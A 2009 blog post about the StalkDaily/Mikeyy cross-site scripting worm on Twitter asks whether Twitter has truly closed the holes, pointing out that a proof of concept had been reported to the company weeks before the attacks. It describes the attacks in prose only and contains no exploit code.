Skip to content

Twitter All Clear - or is it?

From Saturday through Monday, Twitter, the popular social networking site, was hit by wave after wave of cross-site scripting attacks. This so-called worm first manifested as the "StalkDaily.com" XSS attack and morphed as the weekend progressed. The BBC has reported "Twitter all clear after worm wave" and other news sites have repeated their story. However, Twitter has yet to update their status page or blog to state that the XSS holes have been plugged. The last status update said: "We are currently addressing a new manifestation of the worm attack. No passwords, phone numbers, or other sensitive information were compromised as part of this renewed attack".

So, is Twitter finally free of the StalkDaily/Mikeyy XSS attacks? I'm not so sure.

On 20th March, Information Week published an article called, "Twitter Vulnerability Exposed" which reported a "...serious cross-site scripting (XSS) vulnerability that could allow an attacker to hijack users' accounts or, in conjunction with other exploit code, compromise their computers." Secure Science researchers Lance James and Eric Wastl published a proof-of-concept on the Web and said they had notified Twitter. As Lance James, chief scientist with Secure Science, said, their script "is an innocuous proof of concept that forces users to send out a predetermined twitter message, but it could be repurposed into a very nasty worm". Like the recent worm, this exploit relied upon JavaScript to inject tweets through a XSS vulnerability.

Twitter had known about this for 3 weeks before Michael Mooney let his JavaScript exploits loose!

Twitter had a heck of a job in cleaning up these latest attacks. In the initial attack the XSS scripts were coming from the StalkDaily.com site, as well as Mikeyy's mikeyylolz.uuuq .com site (since shut down). Mutated versions then started coming from ireel .com, bambamyo.110mb .com, and yet another site on uuuq.com. These were all exploiting related security vulnerabilities in Twitter.

Now, what is so concerning is this - after the first day of attacks Twitter posted a status update that said:

Earlier today we were informed of a malicious site that was spreading links to StalkDaily.com on Twitter without user consent via a cross-site scripting vulnerability. We’ve taken steps to remove the offending updates, and to close the holes that allowed this “worm” to spread.
No passwords, phone numbers, or other sensitive information were compromised as part of this attack.

If they had truly taken steps to close the holes, how did the later exploits get in? It's clear that Twitter has deleted the fake tweets and cleaned up some accounts, but have they secured their code? I'm not so sure - and I won't be surprised if we see similar XSS attacks happening in the future.

If you enjoyed this post, make sure you subscribe to my RSS feed!

Posted by Lynne Pope on 16 April, 2009

Topic: Tech Talk
Tagged as: cross site scripting, exploits, proof of concept, scripts, security, social networking site, Twitter, vulnerabilities, worm, xss

Share on FriendFeed

{ 0 comments… be the first to comment }

Leave a Comment

You can use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>
Any comments that look like spam will be treated as spam - this includes SEO titles and use of spurious keywords.

By submitting a comment here you grant this site a perpetual license to reproduce your words and name/web site in attribution.

IE 8 Compatibility - Should You Be Worried?
Twitter Attacks Renewed